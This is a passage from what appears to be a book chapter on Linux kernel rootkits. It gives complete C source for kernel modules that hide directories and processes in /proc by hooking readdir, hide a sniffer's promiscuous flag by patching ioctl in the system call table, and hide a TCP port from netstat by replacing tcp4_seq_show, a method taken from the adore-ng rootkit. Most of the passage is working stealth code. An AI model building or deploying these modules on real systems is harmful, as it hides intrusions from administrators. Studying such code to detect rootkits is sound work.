directories but also other files, including devices.

To obtain a pointer to the file structure, the file (directory, device) must be opened.
In the kernel, a file is opened using the filp_open() function. A convenient approach is to
open the root directory in which the necessary files are to be hidden. In the module, this root
directory is specified using the DIRECTORY_ROOT constant. To hide directories in the /proc file
system, the constant must be given the /proc value; to hide files outside of the /proc file
system, the / root directory can be specified. Different root directories must be specified
because /proc is a special file system that resides in memory, is unrelated to the hard drive,
and has its own file_operations structures. Thus, if the / root directory is opened, files in the
/proc file system cannot be hidden, and vice versa.

In the module, not only the pointer to the readdir() function but also the pointer to the
filldir() function, which is passed as the third argument of readdir(), is replaced.
The replacement filldir() function checks for the directory to hide. If there is a match,
the function returns zero without calling the original filldir(), so the entry is never added
to the listing and readdir() simply moves on to the next entry. The name of the file, directory,
or device to hide is specified in the definition of the DIRECTORY_HIDE constant.

In the course of my experiments, I determined that directory names are stored as strings
without the terminating zero, whereas regular file names are stored with it. Therefore, the
module compares strings with the strncmp() function. It compares only the first n characters,
so it can be used to compare a string that lacks the terminating zero.





Listing 21.3. A kernel module to hide directories and processes (hide_pid.c) 





#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/init.h>
#include <linux/fs.h>
#include <linux/err.h>       /* IS_ERR() */
#include <linux/string.h>    /* strncmp(), strlen() */

MODULE_LICENSE("GPL");

#define DIRECTORY_ROOT "/proc" /* Name of the root directory, in which
                                  the files, directories, or devices are to
                                  be hidden */

#define DIRECTORY_HIDE "3774"  /* Name of the directory, file, or device
                                  to be hidden */

typedef int (*readdir_t)(struct file *, void *, filldir_t);

readdir_t orig_proc_readdir = NULL;
filldir_t proc_filldir = NULL;

int new_filldir(void *buf, const char *name, int nlen, loff_t off,
                ino_t ino, unsigned x)
{
    /* Returning 0 without calling the original filldir() skips the entry */
    if (!strncmp(name, DIRECTORY_HIDE, strlen(DIRECTORY_HIDE)))
        return 0;

    return proc_filldir(buf, name, nlen, off, ino, x);
}

int our_proc_readdir(struct file *fp, void *buf, filldir_t filldir)
{
    int r;

    proc_filldir = filldir;
    r = orig_proc_readdir(fp, buf, new_filldir);
    return r;
}

int patch_vfs(readdir_t *orig_readdir, readdir_t new_readdir)
{
    struct file *filep;

    /* filp_open() reports failure with an ERR_PTR() value, not NULL */
    filep = filp_open(DIRECTORY_ROOT, O_RDONLY, 0);
    if (IS_ERR(filep)) {
        return -1;
    }

    if (orig_readdir)
        *orig_readdir = filep->f_op->readdir;

    filep->f_op->readdir = new_readdir;
    filp_close(filep, 0);

    return 0;
}

int unpatch_vfs(readdir_t orig_readdir)
{
    struct file *filep;

    filep = filp_open(DIRECTORY_ROOT, O_RDONLY, 0);
    if (IS_ERR(filep)) {
        return -1;
    }

    filep->f_op->readdir = orig_readdir;
    filp_close(filep, 0);
    return 0;
}

int init_module(void)
{
    patch_vfs(&orig_proc_readdir, our_proc_readdir);
    return 0;
}

void cleanup_module(void)
{
    unpatch_vfs(orig_proc_readdir);
}





21.4. Hiding a Working Sniffer 


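The PROMISC flag can be suppressed by intercepting the ioctl() system call. The call is
replaced with a custom function that clears the flag in the interface flags returned by the
SIOCGIFFLAGS request unless promiscuous mode was explicitly requested with SIOCSIFFLAGS;
it also keeps the flag set on the interface when a SIOCSIFFLAGS request tries to clear it.
The source code for the implementing module is shown in Listing 21.4.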
Listing 21.4. A kernel module suppressing the PROMISC flag (hide_promisc.c)





#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/if.h>
#include <linux/sockios.h>   /* SIOCSIFFLAGS, SIOCGIFFLAGS */
#include <linux/syscalls.h>

MODULE_LICENSE("GPL");

int (*orig_ioctl)(int, int, unsigned long);
unsigned long* sys_call_table;

static int promisc = 0;

void find_sys_call_table(void)
{
    /* See Section 18.2.2 or the source code on the CD-ROM
       for the contents of the find_sys_call_table() function. */
}

int new_ioctl(int fd, int request, unsigned long arg)
{
    int reset = 0;
    int ret;
    struct ifreq *ifr;

    ifr = (struct ifreq *)arg;

    if (request == SIOCSIFFLAGS) {
        if (ifr->ifr_flags & IFF_PROMISC) {
            promisc = 1;
        } else {
            promisc = 0;
            ifr->ifr_flags |= IFF_PROMISC;
            reset = 1;
        }
    }

    ret = (*orig_ioctl)(fd, request, arg);
    if (reset) {
        ifr->ifr_flags &= ~IFF_PROMISC;
    }
    if (ret < 0) return ret;

    if (request == SIOCGIFFLAGS) {
        if (promisc)
            ifr->ifr_flags |= IFF_PROMISC;
        else
            ifr->ifr_flags &= ~IFF_PROMISC;
    }

    return ret;
}

int init_module(void)
{
    find_sys_call_table();
    orig_ioctl = (void *)sys_call_table[__NR_ioctl];
    sys_call_table[__NR_ioctl] = (unsigned long)new_ioctl;
    return 0;
}

void cleanup_module(void)
{
    sys_call_table[__NR_ioctl] = (unsigned long)orig_ioctl;
}





21.5. Hiding from netstat 


The netstat utility reads information from the /proc/net/tcp, /proc/net/udp, and other files
(consult the netstat man page for the complete list of files). Thus, if the lines containing
information about the connections or open ports in question are hidden when these files are
read, netstat will not show them in its output.

Here, however, I consider a different method, the one used in the adore-ng rootkit. It is based
on replacing the pointer to the tcp4_seq_show() function in the tcp_seq_afinfo structure.
This function generates the lines of the /proc/net/tcp file that netstat reads. In the replacement
function, called hacked_tcp4_seq_show(), the strnstr() function is called to search seq->buf for
the substring containing the hexadecimal number of the port to be hidden. If the port is found in
the line just generated, the line is discarded by decreasing seq->count by TMPSZ, the length of
one line. The implementing source code is shown in Listing 21.5.





#include <linux/module.h>
#include <linux/proc_fs.h>
#include <linux/init.h>
#include <linux/string.h>

#include <net/tcp.h>

/* Constant from the /net/ipv4/tcp_ipv4.c file (length of one line
   of /proc/net/tcp) */
#define TMPSZ 150

/* Port number to hide */
#define PORT_TO_HIDE 80

MODULE_LICENSE("GPL");
int (*orig_tcp4_seq_show)(struct seq_file*, void *) = NULL;

char *strnstr(const char *haystack, const char *needle, size_t n)
{
    char *s = strstr(haystack, needle);

    if (s == NULL)
        return NULL;

    if ((s - haystack + strlen(needle)) <= n)
        return s;
    else
        return NULL;
}

int hacked_tcp4_seq_show(struct seq_file *seq, void *v)
{
    int retval = orig_tcp4_seq_show(seq, v);

    char port[12];
    sprintf(port, "%04X", PORT_TO_HIDE);

    /* If the line just generated contains the port, drop the line */
    if (strnstr(seq->buf + seq->count - TMPSZ, port, TMPSZ))
        seq->count -= TMPSZ;
    return retval;
}

int init_module(void)
{
    struct tcp_seq_afinfo *our_afinfo = NULL;
    struct proc_dir_entry *our_dir_entry = proc_net->subdir;

    while (strcmp(our_dir_entry->name, "tcp"))
        our_dir_entry = our_dir_entry->next;

    if ((our_afinfo = (struct tcp_seq_afinfo *)our_dir_entry->data))
    {
        orig_tcp4_seq_show = our_afinfo->seq_show;
        our_afinfo->seq_show = hacked_tcp4_seq_show;
    }

    return 0;
}

void cleanup_module(void)
{
    struct tcp_seq_afinfo *our_afinfo = NULL;
    struct proc_dir_entry *our_dir_entry = proc_net->subdir;

    while (strcmp(our_dir_entry->name, "tcp"))
        our_dir_entry = our_dir_entry->next;

    if ((our_afinfo = (struct tcp_seq_afinfo *)our_dir_entry->data))
    {
        our_afinfo->seq_show = orig_tcp4_seq_show;
    }
}